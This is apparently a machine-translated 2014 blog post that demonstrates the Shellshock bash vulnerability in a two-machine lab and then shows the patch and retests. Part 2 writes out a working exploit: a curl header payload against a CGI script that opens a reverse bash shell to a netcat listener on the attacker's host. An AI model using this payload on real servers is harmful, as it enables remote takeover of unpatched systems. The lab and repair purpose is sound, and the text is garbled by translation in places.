In-depth bash vulnerability analysis and repair testing

On September 6, September 25, 2014, a severe bash vulnerability was detected on the Internet!
I was confused and did not know what happened, so I asked "du Niang" to find out what happened. This vulnerability is even better than OpenSSL's painstaking efforts!
At that time, the solution was to upgrade the bash-4.1.2-15.el6_5.1.x86_64 to solve the problem. I tested it on the Virtual Machine and compared it with the results of the Red Hat official website at that time, I thought everything was okay. Results At noon on September 26, I learned that the patch was invalid, and I needed to upgrade to the bash-4.1.2-15.el6_5.2.x86_64. So I decided to study the vulnerability carefully.
Key words: Bash, ENV, environment variable, CGI, Netcat
[Environment]: One centos6.4 x86_64 (enable Apche Service), one Kali Linux PC (BT5 upgraded !), Connect the two machines.
[Where is the first bash vulnerability ?]
Centos6.4 x86_64 the bash-4.1.2-14.e16.x86_64 version is installed by default.
(1) run the Env command first. This command can define an environment variable and put the variable as a parameter in the subsequent shell command. The shell here is bash shell.

650) This. width = 650; "Title =" 1.jpg" alt = "wkiol1rfjpiwpdxtaacicd7lv6m015.jpg" src = "http://s3.51cto.com/wyfs02/M01/4C/C6/wKioL1RFJpiwPDXtAACicd7lv6M015.jpg"/>

 

650) This. width = 650; "Title =" 2.jpg" alt = "wkiom1rfjoqhcnu9aaclpanto4g951.jpg" src = "http://s3.51cto.com/wyfs02/M01/4C/C5/wKiom1RFJoqhCnu9AACLpANtO4g951.jpg"/>

(2) ENV can also define the environment variables of the function type and execute this function as Bash.

650) This. width = 650; "Title =" 3.jpg" alt = "wKiom1RFJsniUIUMAABjBeH-KWE675.jpg" src = "http://s3.51cto.com/wyfs02/M01/4C/C5/wKiom1RFJsniUIUMAABjBeH-KWE675.jpg"/>

(3) bash vulnerabilities first appeared on the terminal!

650) This. width = 650; "style =" width: 680px; Height: 72px; "Title =" 4.jpg" alt = "wkiol1rfjzsinamraabywvhxbu4836.jpg" src = "http://s3.51cto.com/wyfs02/M02/4C/C6/wKioL1RFJzSiNAmRAABywvHXBu4836.jpg" width = "742" Height = "78"/>

[Part 2 bash-based attack demonstration]
This vulnerability attack is conditional:
A) The program on the attacked object uses Bash as the school-based interpreter at a certain time and processes environment variable assignment.
B) The submission of the Environment Variable assignment string depends on the user input.
Web pages are closely related to our lives. We will directly think of Apache. I will not elaborate on web development here, but you need to know that bashcgi can also write simple and easy-to-use web frameworks to meet actual needs such as monitoring and automation.
(1) Start the HTTPd service and create the duozhu_cgi file in the/var/www/cgi-bin directory. The file has 755 permissions. The file content is as follows.
#! /Bin/bash
Echo "Content-Type: text/html"
Echo ""
Echo "<HTML>"
Echo "<body>"
Echo "zhangduozhu is in Beijing! "
Echo "</body>"
Echo "

650) This. width = 650; "Title =" image 2.jpg" alt = "wkiol1rfj8srsorzaabzw7q0tvo365.jpg" src = "http://s3.51cto.com/wyfs02/M02/4C/C6/wKioL1RFJ8SRSOrzAABZW7q0TVo365.jpg"/>

(2) Use a browser to access this page.

650) This. width = 650; "Title =" image 3.jpg" alt = "wKioL1RFJ-_zRF6SAAByai63pok265.jpg" src = "http://s3.51cto.com/wyfs02/M02/4C/C6/wKioL1RFJ-_zRF6SAAByai63pok265.jpg"/>

This is to simulate normal user access. Next we will simulate the malicious behavior of attackers.

(3) Use the Netcat tool provided by Kali Linux (for details about this tool, contact du Niang) and execute Netcat-LVP 8080 to listen to port 8080 of the local machine, then open a window and execute the curl command to construct an unusual HTTP request. The command is as follows:
Curl-h'x: () {:};/bin/bash-I> &/dev/tcp/192.168.8.149/8080 0> & 1' http: // 192.168.8.153/cgi-bin/duozhu_cgi
This command is used to rebound a bash shell to port 8080 on the Kali Linux machine.

650) This. width = 650; "Title =" 7.jpg" alt = "wkiol1rfkeex860baag3hugj91g249.jpg" src = "http://s3.51cto.com/wyfs02/M00/4C/C6/wKioL1RFKEex860bAAG3hugJ91g249.jpg" width = "699" Height = "277"/>

At this point, a miracle occurred in the listening window of Kali Linux. We successfully got the bash shell !!!

650) This. width = 650; "Title =" 8.jpg" alt = "wkiom1rfkckiejonaaemmvtcq7w090.jpg" src = "http://s3.51cto.com/wyfs02/M00/4C/C5/wKiom1RFKCKieJOnAAEmmVTCq7w090.jpg" width = "717" Height = "153"/>

(4) so we can perform the following operations. Of course, what commands are executed depends on your character.

650) This. width = 650; "Title =" 9.jpg" alt = "wkiol1rfkkawte_paajtfbquxko006.jpg" src = "http://s3.51cto.com/wyfs02/M01/4C/C6/wKioL1RFKKawTE_pAAJTFBQuxKo006.jpg"/>

Oh ~ This vulnerability is dangerous!

[Part 3: Bash vulnerability repair]
The fix is simple, and if conditions permit, execute Yum update bash directly to upgrade to the bash-4.1.2-15.el6_5.2.x86_64 version.
If the conditions are not allowed, you can directly use the RPM package for installation.

650) This. width = 650; "Title =" 10.jpg" alt = "wkiom1rfkjfb6dk3aagmvmcfvv8427.jpg" src = "http://s3.51cto.com/wyfs02/M02/4C/C5/wKiom1RFKJfB6DK3AAGmvMcFVv8427.jpg"/>

The tests after the upgrade are as follows:
(1) After the upgrade, use the Env command to find that environment variables of the function type are not allowed to be defined.
After Upgrade

650) This. width = 650; "style =" width: 701px; Height: 144px; "Title =" 11.jpg" alt = "wkiol1rfkqlzgvowaae43t97oii143.jpg" src = "http://s3.51cto.com/wyfs02/M02/4C/C6/wKioL1RFKQLzGvowAAE43T97oiI143.jpg" width = "696" Height = "148"/>

Before upgrade

650) This. width = 650; "Title =" 3.jpg" alt = "wKiom1RFJsniUIUMAABjBeH-KWE675.jpg" src = "http://s3.51cto.com/wyfs02/M01/4C/C5/wKiom1RFJsniUIUMAABjBeH-KWE675.jpg"/>

(2) When this big trick is difficult, then the curl is certainly a normal result, and Netcat is useless.

650) This. width = 650; "Title =" image 4.jpg" alt = "wkiom1rfkrwsow9daaebvytcy8g167.jpg" src = "http://s3.51cto.com/wyfs02/M02/4C/C5/wKiom1RFKRWSOw9DAAEbvyTCY8g167.jpg"/>

 

650) This. width = 650; "Title =" image 5.jpg" alt = "wkiom1rfkxnqt2cxaabvn1_akhy604.jpg" src = "http://s3.51cto.com/wyfs02/M00/4C/C5/wKiom1RFKXnQt2cxAABVnqFAKhY604.jpg"/>

 

650) This. width = 650; "style =" width: 707px; float: none; Height: 287px; "Title =" 17.jpg" alt = "wkiom1rfkt_hfb_yaapjcukgs7w582.jpg" src = "http://s3.51cto.com/wyfs02/M00/4C/C5/wKiom1RFKT_hfB_YAAPjCUKgs7w582.jpg" width = "477" Height = "218"/>

 

650) This. width = 650; "style =" width: 714px; float: none; Height: 456px; "Title =" 18.jpg" alt = "wkiol1rfkymh8iabaauxrkede94588.jpg" src = "http://s3.51cto.com/wyfs02/M01/4C/C6/wKioL1RFKYmh8iabAAUxRKEdE94588.jpg" width = "692" Height = "445"/>

This article from the "Zhang rudder master" blog, please be sure to keep this source http://zdzhu.blog.51cto.com/6180070/1566113

In-depth bash vulnerability analysis and repair testing